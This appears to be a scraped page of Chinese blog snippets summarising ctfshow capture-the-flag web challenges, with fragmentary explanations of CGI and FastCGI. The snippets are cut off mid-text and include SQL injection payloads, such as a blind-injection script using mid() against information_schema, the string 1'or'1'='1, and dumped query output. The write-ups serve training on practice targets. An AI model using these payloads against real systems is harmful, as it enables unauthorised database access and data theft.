WEB 容器例如 Apache 会根据用户的请求进行简单处理后交给 php 解释器;当 Apache 收到用户对 index.php 的请求后,如果使用的是 CGI,会启动对应的 CGI 程序,对应在这里就是 PHP 的解析器。
web193 过滤了substr,用mid就行; import requestsurl = "http://308c24b8-b4a7-4ad5-a2b9-42804d696718.challenge.ctf.show:8080/api/"# 表名 ctfshow{flxg,ctfshow{user# payload = "0' or if(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),{...
web309 需要拿shell,308的方法不行了,mysql 有密码了 FastCGI是用来提高CGI程序性能的。类似于CGI,FastCGI也可以说是一种协议。简单来说就是CGI的优化:对于CGI来说,每一个Web请求PHP都必须重新解析php.ini、重新载入全部扩展,并重新初始化全部数据结构。而使用FastCGI,所有这些都只在进程启动时发生一次。还有一个...
{"code":0,"msg":"\u67e5\u8be2\u6210\u529f","count":1,"data":[{"id":"1","username":"ctfshow","pass":"ctfshow"},{"Tables_in_ctfshow_web":"ctfshow_flagasa"},{"Tables_in_ctfshow_web":"ctfshow_user"}]} 1.payload2: make_payload("select * from ctfshow_flagasa;"){"code...
web171 //拼接sql语句查找指定ID用户$sql="select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; 无过滤的字符型注入。 payload:1'or'1'='1 滑到底找到flag。 web172 //拼接sql语句查找指定ID用户$sql="select username,password from ctfshow_user2...
Web安全 本文主要总结了我在写ctfshow题目中遇到的关于PHP的考点。因为只总结知识点和考点会比较空洞,也不容易理解,所以我都是通过题目来总结考点... 南城夕雾 413620围观·8·242022-02-13 CTF中PHP相关题目考点总结(上)原创 Web安全 本文总结了ctfshow题目中遇到的关于PHP的考点。